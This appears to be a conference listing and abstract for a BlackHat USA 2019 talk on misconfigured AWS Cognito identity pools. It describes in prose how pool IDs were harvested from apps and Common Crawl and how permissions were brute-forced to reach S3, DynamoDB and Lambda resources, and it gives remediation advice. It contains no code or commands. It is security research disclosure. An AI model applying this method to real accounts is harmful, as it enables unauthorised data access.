Internet-Scale Analysis of AWS Cognito Security

Conference:  BlackHat USA 2019



The presentation discusses the common misconfigurations and security issues in AWS Cognito and how to exploit them.
  • AWS Cognito is commonly misconfigured by developers who assign excessive privileges to unauthenticated and authenticated roles
  • The speaker was able to gain access to sensitive information such as S3 buckets, DynamoDB tables, and Lambda functions through exploiting these misconfigurations
  • CC Lambda and Common Crawl can be used to extract identity pool IDs from the internet
  • Brute force and API calls can be used to enumerate permissions
  • Developers should follow the principle of least privilege and implement object level permissions
The speaker found 280 hardcoded credentials on the internet, with almost 10% of them being root accounts with elevated privileges. 38 of these accounts were found on Common Crawl, which can be used by attackers to do malicious activities. The speaker reported all findings to the AWS security team.


This talk will show the results of an internet-scale analysis of the security of AWS Cognito configurations. During this research, it was possible to identify 2500 identity pools, which were used to gain access to more than 13000 S3 buckets (which are not publicly exposed), 1200 DynamoDB tables and 1500 Lambda functions.The talk starts with an introduction to the AWS Cognito service and how it can be configured by the developers to give end-users direct access to AWS resources such as S3 and DynamoDB. Access is restricted by IAM policies which are under the developer's control and, in many cases, do not follow the least privilege principle.The configuration weakness is first explained step-by-step for a specific AWS account and Cognito identity pool using a series of demos, the same concepts are then automated to perform an internet-scale analysis of AWS Cognito configurations.Because Cognito identity pool IDs are UUID4 it was necessary to download thousands of APKs from the Google Play store, decompile them, and extract the identifiers. Other sources such as Common Crawl were also used to identify valid identifiers. The tools used to perform these tasks will be made public.Each Cognito identity pool that was configured with an unauthenticated role was analyzed using an in-depth permission brute-force tool that identifies potential breaches to least privilege principle.The talk ends with recommendations for developers that want to configure the service in a secure manner, and an analysis of potential reasons for this widespread issue such as poor documentation and examples on AWS site.